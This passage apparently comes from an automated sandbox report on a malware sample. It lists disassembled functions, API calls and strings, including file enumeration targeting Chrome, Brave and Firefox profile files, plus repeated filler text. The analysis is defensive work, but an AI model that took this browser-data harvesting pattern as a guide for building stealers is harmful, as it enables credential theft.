lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D

Function 0040BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00420B17,00420B16,00000000,?,?,?,00421398,00420B0F), ref: 0040BD35
StrCmpCA.SHLWAPI(?,0042139C), ref: 0040BD8D
StrCmpCA.SHLWAPI(?,004213A0), ref: 0040BDA3
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C5FF
FindClose.KERNEL32(000000FF), ref: 0040C611

Strings

Google Chrome, xrefs: 0040C474
Preferences, xrefs: 0040BF5E
\Brave\Preferences, xrefs: 0040C01B
Brave, xrefs: 0040BF42

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 3cb31a516afdf07b5330582016afa5f00bfdf7d0ac033c4989da6c60e319cd33
Instruction ID: 367325ed2970f14afd5354ed5b858d96e390655a4ce51a4c817116a6e2d4185c
Opcode Fuzzy Hash: 3cb31a516afdf07b5330582016afa5f00bfdf7d0ac033c4989da6c60e319cd33
Instruction Fuzzy Hash: 5142BB71901108A7CB14FBB1DC96EED733DAF84314F40456EF90A66191EF389B98CB9A

Function 6C5835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C60F688,00001000), ref: 6C5835D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5835E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5835FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C58363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C58369F
__aulldiv.LIBCMT ref: 6C5836E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C583773
EnterCriticalSection.KERNEL32(6C60F688), ref: 6C58377E
LeaveCriticalSection.KERNEL32(6C60F688), ref: 6C5837BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5837C4
EnterCriticalSection.KERNEL32(6C60F688), ref: 6C5837CB
LeaveCriticalSection.KERNEL32(6C60F688), ref: 6C583801
__aulldiv.LIBCMT ref: 6C583883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C583902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C583918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C58394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C5835DB
GenuntelineI, xrefs: 6C583639
QPC, xrefs: 6C5838FC
GTC, xrefs: 6C583912
AuthcAMDenti, xrefs: 6C583946

Memory Dump Source

Source File: 00000000.00000002.2467880515.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.2467837720.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468031294.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: c196bc05e1350ac9235a3cabf7a847be05f92e093cca614c6ef22f5e0d6560a1
Instruction ID: 4f8a1d1289a59b3aa88277aceaafc628759a16bed444cc01e7665565811ba57b
Opcode Fuzzy Hash: c196bc05e1350ac9235a3cabf7a847be05f92e093cca614c6ef22f5e0d6560a1
Instruction Fuzzy Hash: F1B1D771B193109FDB08DF2ACA9461ABBF5FB8A704F14892DE499E3350D7709901CF8A

Function 004143F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041440C
FindFirstFileA.KERNEL32(?,?), ref: 00414423
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
FindClose.KERNEL32(000000FF), ref: 00414672

Strings

%s\*, xrefs: 00414400
%s\%s, xrefs: 004144DB
%s\%s, xrefs: 00414484

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 61ac3ecc151a1144b0c376dff066e00be32e9f6d56b6178ffe50450b9c322721
Instruction ID: 93dd7dc702b7a0e0fded8c7806ce8f3795ba14a1618ae0d79b753d530a2b99d1
Opcode Fuzzy Hash: 61ac3ecc151a1144b0c376dff066e00be32e9f6d56b6178ffe50450b9c322721
Instruction Fuzzy Hash: 11616571900618ABCB30EFA0DC49FEE737DBF48704F408599F50996151EB78AB858FA5

Function 004139B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004139D3
FindFirstFileA.KERNEL32(?,?), ref: 004139EA
StrCmpCA.SHLWAPI(?,00420F7C), ref: 00413A18
StrCmpCA.SHLWAPI(?,00420F80), ref: 00413A2E
FindNextFileA.KERNEL32(000000FF,?), ref: 00413B7C
FindClose.KERNEL32(000000FF), ref: 00413B91

Strings

%s\%s, xrefs: 004139C7

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 853e2696d4e921a5124c8b138e35452fbac2c551aff32a76306c0037117ea167
Instruction ID: 0978cf4b12305aed0c6265f700eadee139911ff0226e3ee7039eca2cb0139609
Opcode Fuzzy Hash: 853e2696d4e921a5124c8b138e35452fbac2c551aff32a76306c0037117ea167
Instruction Fuzzy Hash: EE5188B1900218ABCB24EF60DC45EEE777DBF44304F40858DB60996151EB749BC5CF98

Function 0040F4F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042155C,00420D7E), ref: 0040F55E
StrCmpCA.SHLWAPI(?,00421560), ref: 0040F5AF
StrCmpCA.SHLWAPI(?,00421564), ref: 0040F5C5
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040F8F1
FindClose.KERNEL32(000000FF), ref: 0040F903

Strings

prefs.js, xrefs: 0040F652

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: dd4acb245da51cf35ad4f045933efe91841ad2ce999a3888966c87a2ac139be0
Instruction ID: 51e7ee45db09aa5f39b002a0c415dffe3bc9b22f3a493195af03bb486277efdd
Opcode Fuzzy Hash: dd4acb245da51cf35ad4f045933efe91841ad2ce999a3888966c87a2ac139be0
Instruction Fuzzy Hash: 00B17571901108ABCB24FF61DC56FEE7379AF54314F0081BEA40A57191EF386B99CB9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425004,?,00401F6C,?,004250AC,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,00425154), ref: 004019B3
StrCmpCA.SHLWAPI(?,004251FC), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
